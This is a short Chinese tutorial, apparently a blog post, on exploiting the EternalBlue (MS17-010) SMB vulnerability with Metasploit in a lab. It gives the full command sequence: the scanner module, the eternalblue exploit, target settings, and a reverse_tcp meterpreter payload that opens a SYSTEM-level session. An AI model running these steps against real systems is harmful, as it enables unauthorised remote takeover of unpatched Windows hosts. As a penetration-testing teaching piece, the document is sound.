使用Msf演示永恒之蓝漏洞的利用过程
MSF的功能模块介绍
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程
1、Auxiliary(辅助模块)
为渗透测试信息搜集提供了大量的辅助模块支持
2、Exploits(攻击模块)
利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
3、Payload(攻击载荷模块)
攻击成功后促使靶机运行的一段植入代码
4、Post (后渗透攻击模块)
收集更多信息或进一步访问被利用的目标系统
5、Encoders(编码模块)
将攻击载荷进行编码,来绕过防护软件拦截
永恒之蓝漏洞演示:
靶机网络信息
攻击机网络信息
连通性测试
msf数据库启用
启动
永恒之蓝漏洞测试
永恒之蓝的漏洞编号:ms17-010
根据漏洞名称搜索 : search ms17_010
辅助模块扫描目标
设置模块:use auxiliary/scanner/smb/smb_ms17_010
查看设置:options
设置所需信息
设置目标地址:set rhosts 192.168.174.129
目标端口默认是445,
如果用nmap端口扫描windows文件共享服务不是开放在445端口上面,那这里需要进行修改,set rport 目标端口
设置好了之后,run或者exploit 进行攻击
绿色的加号为可攻击
2、设置攻击模块对目标进行攻击
使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue
查看所需设置:options
设置所需信息:
设置目标地址:set RHOSTS 192.168.48.219
设置目标端口:set RPORT 445
设置payload:set payload windows/x64/meterpreter/reverse_tcp
设置本地地址:set LHOST 192.168.48.140
攻击:run或者exploit
攻击成功,成功拿到会话
查看目前权限 gutuid
系统权限
标签:set,演示,模块,攻击,010,设置,永恒,msf From: https://www.cnblogs.com/xlvbys/p/17663607.html